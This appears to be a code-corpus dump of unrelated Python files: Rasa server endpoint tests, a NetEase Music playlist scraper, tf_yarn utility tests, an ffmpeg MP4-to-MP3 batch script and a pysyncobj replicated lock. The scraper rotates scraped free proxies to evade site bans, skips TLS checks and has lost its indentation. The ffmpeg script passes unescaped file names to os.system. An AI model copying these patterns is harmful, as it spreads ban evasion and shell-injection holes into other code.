    endpoint = EndpointConfig("https://example.com/model/trained_core_model")
    with open(trained_core_model, "rb") as f:
        # Let requests to the test server itself pass through; mock only the
        # remote model server.
        with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
            mocked.get(
                "https://example.com/model/trained_core_model",
                content_type="application/x-tar",
                body=f.read(),
            )
            data = {"model_server": {"url": endpoint.url}}
            _, response = await rasa_app.put("/model", json=data)
            assert response.status == HTTPStatus.NO_CONTENT
            _, response = await rasa_app.get("/status")
            assert response.status == HTTPStatus.OK
            assert "fingerprint" in response.json()
            # Loading the served model must change the fingerprint.
            assert old_fingerprint != response.json()["fingerprint"]
async def test_load_model_invalid_request_body(rasa_app: SanicASGITestClient):
    """PUT /model without a request body yields 400."""
    _, bad_request_response = await rasa_app.put("/model")
    assert bad_request_response.status == HTTPStatus.BAD_REQUEST
async def test_load_model_invalid_configuration(rasa_app: SanicASGITestClient):
    """PUT /model with a non-existent model path yields 400."""
    _, bad_request_response = await rasa_app.put(
        "/model", json={"model_file": "some-random-path"}
    )
    assert bad_request_response.status == HTTPStatus.BAD_REQUEST
async def test_execute(rasa_app: SanicASGITestClient):
    """Executing an action on an existing conversation returns tracker + messages."""
    sender = "test_execute"
    await _create_tracker_for_sender(rasa_app, sender)
    _, response = await rasa_app.post(
        f"/conversations/{sender}/execute", json={INTENT_NAME_KEY: "utter_greet"}
    )
    assert response.status == HTTPStatus.OK
    body = response.json()
    assert body["tracker"]
    assert body["messages"]
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
    """Executing an action for an unknown conversation ID yields 404."""
    _, not_found_response = await rasa_app.post(
        "/conversations/non_existent_id/execute",
        json={INTENT_NAME_KEY: "utter_greet"},
    )
    assert not_found_response.status == HTTPStatus.NOT_FOUND
    assert not_found_response.json()["message"] == "Conversation ID not found."
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
    """Omitting the action-name key from the payload yields 400."""
    sender = "test_execute_with_missing_action_name"
    await _create_tracker_for_sender(rasa_app, sender)
    _, bad_request_response = await rasa_app.post(
        f"/conversations/{sender}/execute", json={"wrong-key": "utter_greet"}
    )
    assert bad_request_response.status == HTTPStatus.BAD_REQUEST
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
    """Executing an action unknown to the domain yields a 500."""
    sender = "test_execute_with_not_existing_action"
    await _create_tracker_for_sender(rasa_app, sender)
    _, error_response = await rasa_app.post(
        f"/conversations/{sender}/execute", json={"name": "ka[pa[opi[opj[oj[oija"}
    )
    assert error_response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_trigger_intent(rasa_app: SanicASGITestClient):
    """Triggering a known intent returns the updated tracker and bot messages."""
    _, response = await rasa_app.post(
        "/conversations/test_trigger/trigger_intent", json={INTENT_NAME_KEY: "greet"}
    )
    assert response.status == HTTPStatus.OK
    body = response.json()
    assert body["tracker"]
    assert body["messages"]
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
    """Omitting the intent-name key from the payload yields 400."""
    sender = "test_trigger_intent_with_missing_action_name"
    _, bad_request_response = await rasa_app.post(
        f"/conversations/{sender}/trigger_intent", json={"wrong-key": "greet"}
    )
    assert bad_request_response.status == HTTPStatus.BAD_REQUEST
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
    """Triggering an intent that is not in the domain yields 404."""
    sender = "test_trigger_intent_with_not_existing_intent"
    await _create_tracker_for_sender(rasa_app, sender)
    _, not_found_response = await rasa_app.post(
        f"/conversations/{sender}/trigger_intent",
        json={INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"},
    )
    assert not_found_response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
    "input_channels, output_channel_to_use, expected_channel",
    [
        (None, "slack", CollectingOutputChannel),
        ([], None, CollectingOutputChannel),
        ([RestInput()], "slack", CollectingOutputChannel),
        ([RestInput()], "rest", CollectingOutputChannel),
        (
            [RestInput(), SlackInput("test", slack_signing_secret="foobar")],
            "slack",
            SlackBot,
        ),
    ],
)
def test_get_output_channel(
    input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
    """`_get_output_channel` resolves the requested channel, falling back to a
    collecting channel when it is unavailable.
    """
    mock_app = MagicMock()
    mock_app.input_channels = input_channels
    mock_request = MagicMock()
    mock_request.app = mock_app
    mock_request.args = {"output_channel": output_channel_to_use}
    resolved_channel = rasa.server._get_output_channel(mock_request, None)
    assert isinstance(resolved_channel, expected_channel)
@pytest.mark.parametrize(
    "input_channels, expected_channel",
    [
        ([], CollectingOutputChannel),
        ([RestInput()], CollectingOutputChannel),
        ([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
    ],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
    """`output_channel=latest` resolves to the channel of the last user message."""
    mock_app = MagicMock()
    mock_app.input_channels = input_channels
    mock_request = MagicMock()
    mock_request.app = mock_app
    mock_request.args = {"output_channel": "latest"}
    tracker = DialogueStateTracker.from_events(
        "default", [UserUttered("text", input_channel="slack")]
    )
    resolved_channel = rasa.server._get_output_channel(mock_request, tracker)
    assert isinstance(resolved_channel, expected_channel)
def test_app_when_app_has_no_input_channels():
    """An app object without `input_channels` falls back to a collecting channel."""

    class NoInputChannels:
        pass

    mock_request = MagicMock()
    mock_request.app = NoInputChannels()
    resolved_channel = rasa.server._get_output_channel(
        mock_request, DialogueStateTracker.from_events("default", [])
    )
    assert isinstance(resolved_channel, CollectingOutputChannel)
@pytest.mark.parametrize(
    "conversation_events,until_time,fetch_all_sessions,expected",
    # conversation with one session
    [
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("hi", {"name": "greet"}),
                ActionExecuted("utter_greet"),
            ],
            None,
            True,
            """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: greet
    user: |-
      hi
  - action: utter_greet""",
        ),
        # conversation with multiple sessions
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("hi", {"name": "greet"}),
                ActionExecuted("utter_greet"),
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("bye bye", {"name": "goodbye"}),
                ActionExecuted("utter_goodbye"),
            ],
            None,
            True,
            """version: "2.0"
stories:
- story: some-conversation-ID, story 1
  steps:
  - intent: greet
    user: |-
      hi
  - action: utter_greet
- story: some-conversation-ID, story 2
  steps:
  - intent: goodbye
    user: |-
      bye bye
  - action: utter_goodbye""",
        ),
        # conversation with multiple sessions, but setting `all_sessions=false`
        # means only the last one is returned
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("hi", {"name": "greet"}),
                ActionExecuted("utter_greet"),
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("bye bye", {"name": "goodbye"}),
                ActionExecuted("utter_goodbye"),
            ],
            None,
            False,
            """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: goodbye
    user: |-
      bye bye
  - action: utter_goodbye""",
        ),
        # the default for `all_sessions` is `false` - this test checks that
        # only the latest session is returned in that case
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("hi", {"name": "greet"}),
                ActionExecuted("utter_greet"),
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("bye bye", {"name": "goodbye"}),
                ActionExecuted("utter_goodbye"),
            ],
            None,
            None,
            """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: goodbye
    user: |-
      bye bye
  - action: utter_goodbye""",
        ),
        # `until` parameter means only the first session is returned
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
                SessionStarted(timestamp=2),
                UserUttered("hi", {"name": "greet"}, timestamp=3),
                ActionExecuted("utter_greet", timestamp=4),
                ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
                SessionStarted(timestamp=6),
                UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
                ActionExecuted("utter_goodbye", timestamp=8),
            ],
            4,
            True,
            """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: greet
    user: |-
      hi
  - action: utter_greet""",
        ),
        # empty conversation
        ([], None, True, 'version: "2.0"'),
        # Conversation with slot
        (
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                UserUttered("hi", {"name": "greet"}),
                ActionExecuted("utter_greet"),
                SlotSet(REQUESTED_SLOT, "some value"),
            ],
            None,
            True,
            """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: greet
    user: |-
      hi
  - action: utter_greet
- slot_was_set:
  - requested_slot: some value""",
        ),
    ],
)
async def test_get_story(
    rasa_app: SanicASGITestClient,
    monkeypatch: MonkeyPatch,
    conversation_events: List[Event],
    until_time: Optional[float],
    fetch_all_sessions: Optional[bool],
    expected: Text,
):
    """GET /conversations/<id>/story serializes the tracker as YAML stories,
    honoring the `all_sessions` and `until` query parameters.
    """
    conversation_id = "some-conversation-ID"
    # Swap in an in-memory tracker store pre-filled with the scenario events.
    tracker_store = InMemoryTrackerStore(Domain.empty())
    tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
    tracker_store.save(tracker)
    monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
    url = f"/conversations/{conversation_id}/story?"
    query = {}
    # Parameters that are None are omitted entirely so the server's defaults
    # (all_sessions=false, no time cutoff) kick in.
    if fetch_all_sessions is not None:
        query["all_sessions"] = fetch_all_sessions
    if until_time is not None:
        query["until"] = until_time
    _, response = await rasa_app.get(url + urllib.parse.urlencode(query))
    assert response.status == HTTPStatus.OK
    assert response.content.decode().strip() == expected
async def test_get_story_without_conversation_id(
    rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
    """Requesting a story for an unknown conversation ID yields 404."""
    story_url = "/conversations/some-conversation-ID/story"
    _, not_found_response = await rasa_app.get(story_url)
    assert not_found_response.status == HTTPStatus.NOT_FOUND
    assert not_found_response.json()["message"] == "Conversation ID not found."
async def test_get_story_does_not_update_conversation_session(
    rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
    """Fetching a story must be read-only: no new session may be started even
    when the tracker's current session has already expired.
    """
    conversation_id = "some-conversation-ID"
    # domain with short session expiration time of one second
    domain = Domain.empty()
    domain.session_config = SessionConfig(
        session_expiration_time=1 / 60, carry_over_slots=True
    )
    monkeypatch.setattr(rasa_app.app.agent, "domain", domain)
    # conversation contains one session that has expired
    now = time.time()
    conversation_events = [
        ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
        SessionStarted(timestamp=now - 9),
        UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
        ActionExecuted("utter_greet", timestamp=now - 7),
    ]
    tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
    # the conversation session has expired
    assert rasa_app.app.agent.create_processor()._has_session_expired(tracker)
    tracker_store = InMemoryTrackerStore(domain)
    tracker_store.save(tracker)
    monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
    _, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
    assert response.status == HTTPStatus.OK
    # expected story is returned
    assert (
        response.content.decode().strip()
        == """version: "2.0"
stories:
- story: some-conversation-ID
  steps:
  - intent: greet
    user: |-
      hi
  - action: utter_greet"""
    )
    # the tracker has the same number of events as were initially added
    assert len(tracker.events) == len(conversation_events)
    # the last event is still the same as before
    assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
    "initial_tracker_events,events_to_append,expected_events",
    [
        (
            # the tracker is initially empty, and no events are appended
            # so we'll just expect the session start sequence with an `action_listen`
            [],
            [],
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                ActionExecuted(ACTION_LISTEN_NAME),
            ],
        ),
        (
            # the tracker is initially empty, and a user utterance is appended
            # we expect a tracker with a session start sequence and a user utterance
            [],
            [UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
            [
                ActionExecuted(ACTION_SESSION_START_NAME),
                SessionStarted(),
                ActionExecuted(ACTION_LISTEN_NAME),
                UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
            ],
        ),
        (
            # the tracker is initially empty, and a session start sequence is appended
            # we'll just expect the session start sequence
            [],
            [ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
            [ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
        ),
        (
            # the tracker already contains some events - we can simply append events
            [
                ActionExecuted(ACTION_LISTEN_NAME),
                UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
            ],
            [ActionExecuted("utter_greet")],
            [
                ActionExecuted(ACTION_LISTEN_NAME),
                UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
                ActionExecuted("utter_greet"),
            ],
        ),
    ],
)
async def test_update_conversation_with_events(
    rasa_app: SanicASGITestClient,
    monkeypatch: MonkeyPatch,
    initial_tracker_events: List[Event],
    events_to_append: List[Event],
    expected_events: List[Event],
):
    """`update_conversation_with_events` appends events, inserting a session
    start sequence first when the tracker does not already contain one.
    """
    conversation_id = "some-conversation-ID"
    domain = Domain.empty()
    # Swap in an in-memory store, optionally pre-filled with initial events.
    tracker_store = InMemoryTrackerStore(domain)
    monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
    if initial_tracker_events:
        tracker = DialogueStateTracker.from_events(
            conversation_id, initial_tracker_events
        )
        tracker_store.save(tracker)
    fetched_tracker = await rasa.server.update_conversation_with_events(
        conversation_id, rasa_app.app.agent.create_processor(), domain, events_to_append
    )
    assert list(fetched_tracker.events) == expected_events
|
netease_music_base.py | # -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2018-10-12 20:00:17
# @Last Modified by: gunjianpan
# @Last Modified time: 2018-10-21 00:16:26
# coding:utf-8
import codecs
import requests
from bs4 import BeautifulSoup
import sqlite3
import threading
import json
import urllib.parse
import time
import random
class Get_list_id():
def __init__(self):
self.urlslist = ["全部", "华语", "欧美", "日语", "韩语", "粤语", "小语种", "流行", "摇滚", "民谣", "电子", "舞曲", "说唱", "轻音乐", "爵士", "乡村", "R&B/Soul", "古典", "民族", "英伦", "金属", "朋克", "蓝调", "雷鬼", "世界音乐", "拉丁", "另类/独立", "New Age", "古风", "后摇", "Bossa Nova", "清晨", "夜晚", "学习",
"工作", "午休", "下午茶", "地铁", "驾车", "运动", "旅行", "散步", "酒吧", "怀旧", "清新", "浪漫", "性感", "伤感", "治愈", "放松", "孤独", "感动", "兴奋", "快乐", "安静", "思念", "影视原声", "ACG", "儿童", "校园", "游戏", "70后", "80后", "90后", "网络歌曲", "KTV", "经典", "翻唱", "吉他", "钢琴", "器乐", "榜单", "00后"]
self.proxieslist = []
self.headers = {
'Host': "music.163.com",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "keep-alive",
'Referer': "http://music.163.com/",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3578.0 Safari/537.36"}
self.time = 0
def run_list(self):
start = time.time()
threadings = []
for id in self.urlslist:
work = threading.Thread(target=self.get_lists, args=(id,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
end = time.time()
print(end - start)
def get_lists(self, id):
if "/" in id or "&" in id:
f = codecs.open(id.split("/" or "&")
[0] + '.txt', 'a', encoding='utf-8')
else:
f = codecs.open(id + '.txt', 'a', encoding='utf-8')
count = 0
while True:
url = "http://music.163.com/discover/playlist/?order=hot&cat=" + \
urllib.parse.quote_plus(id) + "&limit=35&offset=" + str(count)
html = requests.get(url, headers=self.headers, verify=False).text
try:
table = BeautifulSoup(html, 'html.parser').find(
'ul', id='m-pl-container').find_all('li')
except:
break
ids = []
for item in table:
ids.append(item.find('div', attrs={'class': 'bottom'}).find(
'a').get('data-res-id'))
count += 35
f.write(str(ids) + '\n')
def get_detail_list(self, list_id, file_d, category):
url = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)
proxies = {'http': self.proxieslist[random.randint(
0, len(self.proxieslist) - 1)]}
try:
data = requests.get(url, headers=self.headers,
proxies=proxies, timeout=5).json()
except Exception as requestsError:
print(category + " Error " + list_id + proxies['http'])
return []
if data['code'] != 200:
print(category + " Error " + list_id + proxies['http'])
return []
result = data['result']
musiclist = ""
tracks = result['tracks']
if len(tracks) == 1:
print(category + " Error " + list_id + proxies['http'])
for track in tracks:
musiclist += (track['name'] + '\n')
file_d.write(musiclist)
self.time += 1
if self.time % 100 == 0:
print(self.time)
def get_detail(self, category):
iplist = []
ipfile = codecs.open('ip', 'r', encoding='utf-8')
for index in ipfile.readlines():
iplist.append(index[0:-1])
print(iplist)
self.proxieslist = iplist
threadings = []
if "/" in category or "&" in category:
f = codecs.open(category.split("/" or "&")
[0] + ".txt", 'r', encoding='utf-8')
else:
f = codecs.open(category + ".txt", 'r', encoding='utf-8')
if "/" in category or "&" in category:
file_d = codecs.open(category.split(
"/" or "&")[0] + "data.txt", 'a', encoding='utf-8')
else:
file_d = codecs.open(category + "data.txt", 'a', encoding='utf-8')
for line in f.readlines():
for id in eval(line.replace('\n', '')):
work = threading.Thread(
target=self.get_detail_list, args=(id, file_d, category))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
def run_detail(self):
self.time = 0
start = time.time()
threadings = []
for category in self.urlslist:
self.get_detail(category)
end = time.time()
print(end - start)
print(self.time)
def ip_spider(self, numpage):
    """Scrape HTTP proxies from xicidaili.com and append to file 'ip'
    the ones that can still fetch a full NetEase playlist (a banned
    proxy gets exactly one track back from the probe playlist).

    Args:
        numpage (int): number of listing pages to scrape
    """
    file_d = codecs.open("ip", 'a', encoding='utf-8')
    headers = {"User-Agent": "IP"}
    # loop-invariant probe URL, hoisted out of the row loop
    test_url = 'http://music.163.com/api/playlist/detail?id=432853362'
    for page in range(1, numpage + 1):
        url = 'http://www.xicidaili.com/nn/' + str(page)
        html = requests.get(url, headers=headers, verify=False).text
        rows = BeautifulSoup(html, 'html.parser').find_all('tr')
        # BUG FIX: the inner loop used to shadow the outer 'index'
        # variable; skip the header row and iterate the rest
        for row in rows[1:]:
            tds = row.find_all('td')
            if tds[5].text.lower() == 'http':
                proxy = tds[5].text.lower() + '://' + tds[1].text + \
                    ':' + tds[2].text
                proxies = {'http': proxy}
                print(proxy)
                try:
                    data = requests.get(
                        test_url, headers=self.headers,
                        proxies=proxies, timeout=2).json()
                    tracks = data['result']['tracks']
                    print(len(tracks))
                    if len(tracks) != 1:
                        file_d.write(proxies['http'] + '\n')
                except Exception:
                    # best-effort probe: a dead/slow proxy is skipped
                    pass
    file_d.close()
# table = BeautifulSoup(r.text, 'html.parser').find('ul', class_='f-hide')
# def get_id(list_id):
# url = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)
# proxies = {
# 'http': 'http://118.190.95.35:9001',
# 'https': 'http://180.213.193.137:8123'
# }
# headers = {
# 'Host': "music.163.com",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
# "Accept-Encoding": "gzip, deflate, br",
# "Accept-Language": "zh-CN,zh;q=0.9",
# "Connection": "keep-alive",
# 'Referer': "http://music.163.com/",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36"}
# data = requests.get(url, headers=headers, proxies=proxies).json()
# if data['code'] != 200:
# return []
# result = data['result']
# musiclist = ''
# tracks = result['tracks']
# for track in tracks:
# musiclist += (track['name'] + '\n')
# print(musiclist)
# def test():
# url = 'http://wyydsb.xin'
# proxies = {
# 'http': 'http://118.190.95.35:9001',
# 'https': 'https://125.70.13.77:8080'
# }
# headers = {
# 'Host': "music.163.com",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
# "Accept-Encoding": "gzip, deflate, br",
# "Accept-Language": "zh-CN,zh;q=0.9",
# "Connection": "keep-alive",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36"}
# data = requests.get(url, headers=headers,
# proxies=proxies, timeout=30).text
# print(data)
|
test__internal.py | import errno
import os
import socket
import subprocess
import sys
import tempfile
import zipfile
from subprocess import check_output
from zipfile import ZipFile, is_zipfile
import pytest
from tf_yarn._internal import (
MonitoredThread,
reserve_sock_addr,
dump_fn,
load_fn,
xset_environ,
zip_path,
StaticDefaultDict,
create_and_pack_conda_env,
)
def test_monitored_thread():
    """The exception raised inside the target must be captured."""
    def boom():
        raise RuntimeError(42)

    worker = MonitoredThread(target=boom)
    worker.start()
    worker.join()
    captured = worker.exception
    assert isinstance(captured, RuntimeError)
    assert captured.args == (42, )
def test_reserve_sock_addr():
    """The reserved (host, port) must stay bound while the context
    manager is open, so a second bind fails with EADDRINUSE."""
    with reserve_sock_addr() as (host, port):
        # FIX: close the probe socket instead of leaking it
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            with pytest.raises(OSError) as exc_info:
                sock.bind((host, port))
            # Ensure that the iterator holds the sockets open.
            assert exc_info.value.errno == errno.EADDRINUSE
def test_xset_environ(monkeypatch):
    """xset_environ sets a variable that is not yet present."""
    fake_environ = {}
    monkeypatch.setattr(os, "environ", fake_environ)
    xset_environ(foo="boo")
    assert fake_environ["foo"] == "boo"
def test_xset_environ_failure(monkeypatch):
    """xset_environ refuses to overwrite an existing variable."""
    fake_environ = {"foo": "bar"}
    monkeypatch.setattr(os, "environ", fake_environ)
    with pytest.raises(RuntimeError):
        xset_environ(foo="boo")
    # the original value must be untouched
    assert fake_environ["foo"] == "bar"
def test_encode_fn_decode_fn(tmpdir):
    """A dumped closure must load back and produce the same result."""
    def inner(value):
        return value

    def outer():
        return inner(42)

    target = tmpdir.join("f.dill")
    dump_fn(outer, target)
    # the round-tripped function still sees its captured 'inner'
    assert load_fn(target)() == outer()
def test_zip_path(tmpdir):
    """zip_path must archive nested files with their contents intact."""
    text = "Hello, world!"
    tmpdir.mkdir("foo").join("bar.txt").write_text(text, encoding="utf-8")
    payload = 0xffff.to_bytes(4, "little")
    tmpdir.join("boo.bin").write_binary(payload)

    with tempfile.TemporaryDirectory() as staging:
        archive = zip_path(str(tmpdir), staging)
        assert os.path.isfile(archive)
        assert archive.endswith(".zip")
        assert is_zipfile(archive)
        with ZipFile(archive) as zf:
            names = {entry.filename for entry in zf.filelist}
            for expected in ("foo/", "foo/bar.txt", "boo.bin"):
                assert expected in names
            # contents survive the round trip, not just the names
            assert zf.read("foo/bar.txt") == text.encode()
            assert zf.read("boo.bin") == payload
def test_static_default_dict():
    """Missing keys fall back to the default without being inserted."""
    mapping = StaticDefaultDict({"foo": 42}, default=100500)
    assert mapping["foo"] == 42
    # unknown keys return the default ...
    assert mapping["bar"] == 100500
    # ... but the lookup must not create the key
    assert "bar" not in mapping
def conda_is_available():
    """Return True if the ``conda`` executable can be run.

    FIX: the original passed a list together with ``shell=True`` — a
    known subprocess pitfall (on POSIX, list items after the first
    become shell arguments, not command arguments). Running the
    command directly is equivalent for this single-element list, but
    a missing executable then raises OSError, which we treat as
    "not available".
    """
    try:
        p = subprocess.run(
            ["conda"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
    except OSError:
        return False
    return p.returncode == 0
@pytest.mark.skipif(not conda_is_available(), reason="conda is not available")
def test_create_conda_env(tmpdir):
    """An env zip is produced, unpacks, and its python runs pycodestyle."""
    version = "{0.major}.{0.minor}".format(sys.version_info)
    env_zip_path = create_and_pack_conda_env(
        name="test",
        python=version,
        pip_packages=["pycodestyle"],
        root=str(tmpdir))
    assert os.path.isfile(env_zip_path)
    env_path, _ = os.path.splitext(env_zip_path)
    assert os.path.isdir(env_path)

    unzip_dir = tmpdir.join("unzipped")
    with zipfile.ZipFile(env_zip_path) as zf:
        zf.extractall(unzip_dir)
    python_bin = os.path.join(unzip_dir, "bin", "python")
    os.chmod(python_bin, 0o755)
    # smoke-test the packaged interpreter and the pip package
    check_output([python_bin, "-m", "pycodestyle", "--version"])
|
mp4AuotMp3.py | #!/usr/local/python3
#使用ffmpeg,多线程将mp4抽取为mp3
#this is change mp3 from mp4 with ffmpeg
import os
import glob
import threading
import time
#fileList = os.listdir("./")
#print(len(fileList))
#print(fileList)
#for i in fileList:
# if not os.path.isfile(i):
# fileList.remove(i)
#print(len(fileList))
#print(fileList)
mp4List = glob.glob("*.mp4")  # every .mp4 file in the current working directory
def change(mp4file):
    """Extract the audio of *mp4file* into ./mp3/<name>.mp3 via ffmpeg.

    Args:
        mp4file (str): path of the source video, relative to cwd
    """
    # replace ':' (problematic in shells/filesystems) with '-'
    safe_name = mp4file.replace(":", "-")
    # FIX: splitext keeps dots inside the file name; the previous
    # split(".")[0] truncated names like "a.b.mp4" to "a"
    base = os.path.splitext(safe_name)[0]
    mp3file = "./mp3/" + base + ".mp3"
    # FIX: quote both paths so names containing spaces survive the shell
    cmd = 'ffmpeg -i "' + mp4file + '" -f mp3 -vn "' + mp3file + '"'
    print(cmd)
    # FIX: exist_ok avoids the check-then-create race between the
    # worker threads that all call this function concurrently
    os.makedirs("mp3", exist_ok=True)
    print(threading.current_thread())
    os.system(cmd)
def show(n):
    """Sleep briefly, then print the given value and the current thread."""
    time.sleep(2)
    message = "value:" + n
    print(message)
    print(threading.current_thread())
# one conversion worker thread per discovered MP4 file
for source_file in mp4List:
    worker = threading.Thread(target=change, args=(source_file,))
    worker.start()
#print(len(mp4List))
#print(mp4List)
|
lock.py | from __future__ import print_function
import threading
import time
import weakref
from pysyncobj import SyncObj, replicated
class LockImpl(SyncObj):
    """Replicated lock table.

    State is a dict {lockPath: (clientID, lastRefreshTime)}. Methods
    decorated with @replicated are applied by pysyncobj on every node
    of the cluster, so their bodies must stay deterministic. A lock
    whose timestamp is older than `autoUnlockTime` is treated as
    expired.
    """

    def __init__(self, selfAddress, partnerAddrs, autoUnlockTime, conf):
        super(LockImpl, self).__init__(selfAddress, partnerAddrs, conf=conf)
        # address of this node (kept for reference/debugging)
        self.__selfClientID = selfAddress
        # lockPath -> (clientID, last acquire/ping timestamp)
        self.__locks = {}
        # seconds of silence after which a lock is considered expired
        self.__autoUnlockTime = autoUnlockTime
        # when True, replicated operations are traced to stdout
        self.__verbose = True

    @replicated
    def acquire(self, lockPath, clientID, currentTime):
        """Try to take `lockPath` for `clientID`; return True on success.

        Re-acquiring a lock the client already holds just refreshes
        its timestamp.
        """
        if self.__verbose:
            print(f"{threading.get_ident()} acquire: {lockPath}, {clientID}, {currentTime}")
        existingLock = self.__locks.get(lockPath, None)
        # Auto-unlock old lock
        if existingLock is not None:
            if currentTime - existingLock[1] > self.__autoUnlockTime:
                existingLock = None
        # Acquire lock if possible
        if existingLock is None or existingLock[0] == clientID:
            self.__locks[lockPath] = (clientID, currentTime)
            return True
        # Lock already acquired by someone else
        return False

    @replicated
    def ping(self, clientID, currentTime):
        """Refresh every lock held by `clientID`; drop expired locks."""
        # if self.__verbose:
        #     print(f"ping: {clientID}, {currentTime}, {self.__locks}")
        for lockPath in list(self.__locks.keys()):
            lockClientID, lockTime = self.__locks[lockPath]
            if currentTime - lockTime > self.__autoUnlockTime:
                del self.__locks[lockPath]
                continue
            if lockClientID == clientID:
                self.__locks[lockPath] = (clientID, currentTime)

    @replicated
    def release(self, lockPath, clientID):
        """Drop `lockPath` if it is currently held by `clientID`."""
        if self.__verbose:
            print(f"{threading.get_ident()} release: {lockPath} {clientID}")
        existingLock = self.__locks.get(lockPath, None)
        if existingLock is not None and existingLock[0] == clientID:
            del self.__locks[lockPath]

    @replicated
    def toggle_verbose(self):
        """Flip tracing on/off (replicated: flips on every node)."""
        self.__verbose = not self.__verbose
        print(f"{threading.get_ident()} verbose: {self.__verbose}")

    def isOwned(self, lockPath, clientID, currentTime):
        # Local read-only check: does `clientID` hold a fresh lock?
        existingLock = self.__locks.get(lockPath, None)
        # if self.__verbose:
        #     print(existingLock, clientID)
        if existingLock is not None:
            if existingLock[0] == clientID:
                if currentTime - existingLock[1] < self.__autoUnlockTime:
                    return True
        return False

    def isAcquired(self, lockPath, clientID, currentTime):
        # Local read-only check: is the lock held (by anyone) and fresh?
        # NOTE(review): clientID is unused here — any fresh holder
        # returns True; confirm this is the intended semantics.
        existingLock = self.__locks.get(lockPath, None)
        # if self.__verbose:
        #     print(existingLock, clientID)
        if existingLock is not None:
            if currentTime - existingLock[1] < self.__autoUnlockTime:
                return True
        return False
class Lock(object):
    """Client-side wrapper around the replicated LockImpl.

    Starts a background thread that periodically pings the cluster to
    keep this client's locks alive, and exposes simple acquire /
    release / query helpers.
    """

    def __init__(self, selfAddress, partnerAddrs, autoUnlockTime, conf=None):
        # replicated lock table shared with the other nodes
        self.__lockImpl = LockImpl(selfAddress, partnerAddrs, autoUnlockTime, conf=conf)
        # this client's identity within the lock table
        self.__selfID = selfAddress
        self.__autoUnlockTime = autoUnlockTime
        # the keep-alive thread stops once the main thread exits
        self.__mainThread = threading.current_thread()
        self.__initialised = threading.Event()
        # weakref.proxy lets this Lock be garbage collected while the
        # background thread still runs (it then gets ReferenceError
        # and exits)
        self.__thread = threading.Thread(target=Lock._autoAcquireThread, args=(weakref.proxy(self),))
        self.__thread.start()
        # FIX: wait on the Event instead of the previous
        # `while not is_set(): pass` spin loop, which burned a full
        # CPU core until the thread started
        self.__initialised.wait()

